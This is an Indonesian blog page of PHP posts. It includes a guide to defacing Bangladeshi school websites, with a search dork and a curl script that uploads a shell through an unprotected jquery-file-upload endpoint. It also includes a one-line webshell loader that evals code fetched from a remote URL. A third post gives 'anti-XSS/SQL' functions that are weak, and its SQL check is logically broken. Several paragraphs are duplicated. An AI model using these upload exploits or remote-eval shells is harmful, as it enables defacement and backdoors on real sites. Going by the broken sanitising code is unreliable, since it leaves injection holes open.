Showing posts with label PHP. Show all posts
Deface website sekolah Bangladesh
hallo.
kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.
Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.
dork: Developed by exdmania
script:
kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.
Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.
dork: Developed by exdmania
script:
<?phpPOC:
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
hasil:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/
PHP file Get Contents () Function | Ukuran PHP kecil
Habis jalan jalan di google eh nemu deh ilmu beginian
Fungsi ini digunakan untuk mengambil fungsi script dari url eksternal / bisa juga Memperkecil Ukuran file php . intinya gini
Lu bisa ngambil file.txt dari web nah misal yg paling sering nih Shell / backdoor ,tp terserah mau script apa uploader , shell ato apalah terserah, tp disini contoh shell aja ya
file_Get_Contents () Function ini sangat menguntungkan cuk, karena ini bisa mengecilkan ukuran, bahkan rata rata gak nyampe 1kb cuk.
<?php
eval("?>" . file_get_contents("localhost/filetxtnya.txt"));
?>
Contoh nih gw bikin shell txt yg udah ketanem , kalau belum ya tanem dulu lah di web :v Kalo dipastebin jgn lupa di Raw in
<?php
eval("?>" . file_get_contents("http://sinkaroid.cf/shells/ghost.txt"));
?>
Nah otomatis script diatas yg berwarna biru itu adalah shell ringan dgn ukuran gak nyampe 1kb cuk.
intinya http://sinkaroid.cf/shells/ghost.txt itu adalah shell dengan ekstensi .php , nah kita masukan di script PHP file_Get_Contents () Function diatas maka jadilah shell bentuk .php yg ukuranya kecil ga nyampe 1kb =))
Sekian artikel ini, semoga bisa membantu =))
NB:
-Cara ini gak cuma buat nganu shell aja bro, pokoknya yg berekstensi .php
Sumber
Fungsi ini digunakan untuk mengambil fungsi script dari url eksternal / bisa juga Memperkecil Ukuran file php . intinya gini
Lu bisa ngambil file.txt dari web nah misal yg paling sering nih Shell / backdoor ,tp terserah mau script apa uploader , shell ato apalah terserah, tp disini contoh shell aja ya
file_Get_Contents () Function ini sangat menguntungkan cuk, karena ini bisa mengecilkan ukuran, bahkan rata rata gak nyampe 1kb cuk.
<?php
eval("?>" . file_get_contents("localhost/filetxtnya.txt"));
?>
Contoh nih gw bikin shell txt yg udah ketanem , kalau belum ya tanem dulu lah di web :v Kalo dipastebin jgn lupa di Raw in
<?php
?>
Nah otomatis script diatas yg berwarna biru itu adalah shell ringan dgn ukuran gak nyampe 1kb cuk.
intinya http://sinkaroid.cf/shells/ghost.txt itu adalah shell dengan ekstensi .php , nah kita masukan di script PHP file_Get_Contents () Function diatas maka jadilah shell bentuk .php yg ukuranya kecil ga nyampe 1kb =))
Ini contoh shell yg udah di PHP File get Contens () Funciton bro, Sizenya aja gak nyampe 1kb.
Sekian artikel ini, semoga bisa membantu =))
NB:
-Cara ini gak cuma buat nganu shell aja bro, pokoknya yg berekstensi .php
Sumber
Cara menutup celah XSS dan SQL
Seperti yang kita ketahui bahwa bug SQL dan XSS sangat banyak , sampai saat ini pun masih banyak situs-situs yg mempunyai bug sql dan xss , itu semua karena developers yang malas untuk masalah keamanan dalam website.
Kali ini saya akan sharing cara menutup celah xss dan sql , tujuan postingan kali ini agar yang baru belajar CRUD bisa membiasakan diri untuk menutup sebuah bug sql dan xss.
penutupan celah xss dan sql ini sudah saya terapkan di situs saya pribadi , namun saya masih was-was juga karena semakin hari dan semakin lama dan semakin lampau pasti akan ada yang bisa bypass.
di atas adalah cara untuk menutup sebuah bug xss , nah kalau binggung cara meletakanya gimana nnti saya akan jelaskan di bawah.
di atas adalah cara untuk menutup sebuah bug sql.
nah di atas adalah OOP , jadi kalau mau di terapin di php biasa kalian cuman ambil fungsi di dalam public
semoga bermanfaat dan bila ada yang bingung , silahkan di tanyakan.
Sumber : Post diambil dari Forum IndoXploit yang post oleh Logika Galau
Kali ini saya akan sharing cara menutup celah xss dan sql , tujuan postingan kali ini agar yang baru belajar CRUD bisa membiasakan diri untuk menutup sebuah bug sql dan xss.
penutupan celah xss dan sql ini sudah saya terapkan di situs saya pribadi , namun saya masih was-was juga karena semakin hari dan semakin lama dan semakin lampau pasti akan ada yang bisa bypass.
PHP Code:
public function anti_xss($data){
//$data = htmlspecialchars($data);
$data = htmlentities($data);
$data = strip_tags($data);
$data = filter_var($data, FILTER_SANITIZE_STRING);
return $data;
} di atas adalah cara untuk menutup sebuah bug xss , nah kalau binggung cara meletakanya gimana nnti saya akan jelaskan di bawah.
PHP Code:
public function anti_sql($id){
$id = is_numeric(htmlspecialchars($id));
if($id){
return true;
}else{
return false;
}
} nah di atas adalah OOP , jadi kalau mau di terapin di php biasa kalian cuman ambil fungsi di dalam public
semoga bermanfaat dan bila ada yang bingung , silahkan di tanyakan.
Sumber : Post diambil dari Forum IndoXploit yang post oleh Logika Galau
Subscribe to:
Posts (Atom)